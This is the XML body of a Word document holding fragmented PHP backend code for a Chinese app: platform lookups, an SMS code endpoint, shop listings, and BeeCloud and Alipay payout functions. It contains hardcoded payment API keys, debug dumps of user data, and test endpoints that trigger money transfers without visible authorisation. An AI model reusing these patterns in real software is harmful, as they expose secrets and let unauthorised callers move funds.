          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597428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facebook facebook</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FF7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weibo weibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAD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twitter twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD9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telegram telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386E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6124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details() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF0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$id=input('post.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A298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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B29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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75280B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547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Db::name('platform')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7DB4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6790E1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304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$replace_img=function($app){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281C4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$preg="/^http(s)?:\\/\\/.+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67677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$app['logo']=preg_match($preg, $app['logo'])?$app['logo']:_imgUrl() . $app['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071508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$app;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE66B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B8E0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$db=$replace_img($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C7E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$db['name']=$db['name_zh'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D38F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json($db);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14453F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FA3F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104252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B6AA1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B8C5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/api/platform/kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B8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应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CCB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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49652A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92CE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240B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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCA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86A4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kind() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EFF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$kind=db('platform')-&gt;field('kind')-&gt;group('kind')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12838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json(array_filter(array_column($kind, 'kind')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D1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2FBB9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E0B0B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8D46C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7841B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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBDE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app\api\model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416050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26FEC3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think\Loader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168DD2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59DB8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5683E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C374D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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097C9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2A22C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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DE2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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B95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0CDA6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4C7DE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14DCF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882E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0F7D59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F257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2A03E3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47E0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4A8260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ABB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04835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C3F3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446175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69D92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4B9EF5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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EF6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($member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AEF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77924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41EC8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29D68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25F8AB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4FE3D0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71BC26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5A1213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7FE6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7FAE6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616479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8B8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C25E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BBBA7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391103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5CD1D8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796787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3BFD6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419946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302A45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A6BD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B6A0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43D27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292783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6BE2BD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74828D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F70A9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301941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53F002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A0F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77C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626A3C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9B85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9704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46A18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65443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0446AE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9065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A594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4739C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4185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AAB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84E5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banben()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075855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CC47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input('banben');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D387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 = '0.0.1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEF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 == $b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D519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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前是最新版本</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD96C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922BB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247CB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已有</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $b . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新版本</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A55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=&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0A1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1367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7E94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073A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pingguoApp()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606668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CEE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json([0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE7A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925E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pingguoApp2()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F3C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FCD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3848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errors()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A545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9B42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1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42588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0211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3F723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2129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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D4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A8D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notify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F4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18DF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file_get_contents('php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394025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file_put_contents("1.txt", var_export($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8D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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D359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44111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$persistentId = $data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E16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 = $data['items']['0']['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F68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($persistentId &amp;&amp; $video) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF12B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db::name('article')-&gt;where(['qiniu_video' =&gt; $persistentId, 'qiniu_video_type' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C3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E5871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 $db)-&gt;update(['qiniu_video_type' =&gt; 0, 'video' =&gt; $video]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221005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BB58E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F31D5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E7F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F3BE5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7CF2C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EF7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BBB96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667BD8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32E5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924B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72D9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/api/index/code </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFAE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发送验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDF9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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE82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E2CB3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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E24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@apiParam {String} text      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找回密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A37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发送成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DC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发送失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595A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96DD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code()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC59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827D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(request()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B0A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input('post.username', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE7B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input('post.text', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC910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 _code($username, $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B813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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA75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cookie('code', time() + 120, 120);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F1B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520199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发送成功，验证码有效期</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226775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235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4A2FB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3B933D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$code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5F3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301,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7394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19E5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86CA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061B15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1041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9D1B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mingxi()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B3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CFF5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76F89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(input('typeid/d')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961A1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$where['typeid'] = input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183A8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E194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Db::name('shoplist')-&gt;field('id,title,image,jinbi,money')-&gt;where($where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D94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3B10A9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$data[$k]['jinbi'] = $v['jinbi'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094910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$data[$k]['money'] = $v['money'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F1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$data[$k]['image'] = _imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED8B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0AF4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dump($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F97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4E7688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$money_login_money = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466C1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'1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65106A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$money_login = _moneyDb(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D83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CA71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5776CA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['money' =&gt; $money_login_money, 'content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币赠送</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'type' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335A2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B8C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7F8F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echo($money_login);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE84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246A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ceshi()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24228D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9A21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Db::name('shoplist_records')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200868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-&gt;fetchSql(true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACB9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-&gt;group('uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66436F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-&gt;having('count(id)&gt;3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44201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-&gt;order('id desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49BD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-&gt;limit(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03C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B3489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$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79984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BAC2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userList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C79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AF47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input('post.pages/d') ? input('post.pages/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F514A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$where['a.hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9650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4D953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['__ARTICLE__ w', 'a.id=w.uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072B9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36C8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Db::name('member')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.id')-&gt;order('a.id desc')-&gt;fetchSql(false)-&gt;paginate(100)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB844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241D52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_user($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA9A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2A3EB4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901D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dump($data['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4A2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6FF4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pay()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF715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F612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362B27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\beecloud\rest\api::registerApp('df051f1c-e9d3-4656-91bb-717346ed8dfc', '3b592873-9cc6-46c6-a3e7-a03883580d58', '91b0005a-61a5-48d2-a622-1031f090b531', 'dd58dd3b-da20-40b7-9e15-907b2555c35e');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093FF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38B12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'timestamp' =&gt; time() * 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA06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 =&gt; 'WX_TRANSFER',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4E8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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>微信企业打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769484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'transfer_no' =&gt; "bcdemo" . time(),    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB95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'total_fee' =&gt; 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD74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'channel_user_id' =&gt; 'o3kKrjlROJ1qlDmFdlBQA95zxxx'   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DCC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6751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\beecloud\rest\api::transfer($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB908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($result-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F3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print_r($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B325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460C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7137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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打款成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526863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(Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4F9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$e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A693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6CE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74C2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alipay()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00452B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97A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Loader::import('alipay.aop.AopClient', EXTEND_PATH, '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C49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Loader::import('alipay.aop.request.AlipayFundTransToaccountTransferRequest', EXTEND_PATH, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B89D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Loader::import('alipay.aop.SignData', EXTEND_PATH, '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611BAF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$this-&gt;userWithDraw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34EE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4FA884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F9B1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17E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@User </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一秋</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE18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74C6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$userid          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E662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$out_biz_no      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A8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$payee_account   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现的支付宝账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5BF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$amount          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>转账金额</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D02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$payee_real_name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号的真实姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806FC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FF1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bool|Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CA3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38DC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userWithDraw($userid = 1, $out_biz_no = '', $payee_account = '12385@163.com', $amount = 1, $payee_real_name = '123</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>翔</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37704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A7ED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$out_biz_no = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B4B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$payer_show_name = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户红包提现</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9D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$remark = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>红包提现到支付宝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FBF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 = new \AopClient();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8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'gatewayUrl' =&gt; 'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA3F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=&gt; '201811931182',</w:t>
      </w:r>
    </w:p>
